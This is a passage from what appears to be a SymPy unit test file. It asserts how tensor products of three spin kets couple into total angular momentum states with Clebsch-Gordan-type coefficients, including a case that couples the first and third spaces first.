couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, -1)))
== -sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1)))
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0)))
== -sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, -1))
) == JzKetCoupled(
S(5) / 2,
Rational(-5, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
# j1=1, j2=1, j3=1
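    # 1x1x1 decomposes into total j = 0, 1, 2, 3; the intermediate value j12 in
    # (1, 2, j12) distinguishes the repeated j = 1 and j = 2 multiplets.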
assert couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 1))) == JzKetCoupled(
3, 3, (1, 1, 1), ((1, 2, 2), (1, 3, 3))
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)))
== sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)))
== sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 5
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 1)))
== sqrt(2) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)))
== JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
- sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
+ JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
+ JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 6
+ JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)))
== sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 30
+ JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
+ sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 3
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)))
== sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
+ JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 30
+ JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)))
== -sqrt(2) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)))
== -JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
- sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
- JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
- JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 6
+ JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)))
== -sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 0)))
== -sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- 2 * sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 5
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)))
== -sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
- JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 6
- JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)))
== -JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
- sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
+ JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)))
== sqrt(2) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)))
== sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
+ JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 30
- JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
+ sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 3
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)))
== sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 30
- JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
+ JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 6
- JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)))
== JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
- sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
- JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, -1)))
== -sqrt(2) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)))
== sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 5
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)))
== -sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert couple(
TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, -1))
) == JzKetCoupled(3, -3, (1, 1, 1), ((1, 2, 2), (1, 3, 3)))
    # j1=1/2, j2=1/2, j3=3/2
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(3, 2)),
)
) == JzKetCoupled(
Rational(5, 2),
S(5) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), S.Half),
)
)
== sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(15)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
            (S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-1, 2)),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ 2
* sqrt(30)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-3, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(3, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
            (S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), S.Half),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-1, 2)),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-3, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
            (S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(3, 2)),
)
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
            (S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), S.Half),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-1, 2)),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-3, 2)),
)
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
            (S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(3, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), S.Half),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
- 2
* sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-1, 2)),
)
)
== -sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(15)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
            (S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-3, 2)),
)
) == JzKetCoupled(
Rational(5, 2),
-S(5) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
# Couple j1 to j3
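    # Passing ((1, 3), (1, 2)) couples spaces 1 and 3 first and then couples
    # space 2 to that result, so the kets carry ((1, 3, j13), (1, 2, j)) in place
    # of the default ((1, 2, j12), (1, 3, j)).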
# j1=1/2, j2=1/2, j3=1/2
assert couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
) == JzKetCoupled(
Rational(3, 2),
S(3) / 2,
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 0), (1, 2, S.Half))
)
/ 2
- sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 1), (1, 2, S.Half))
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
            (S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
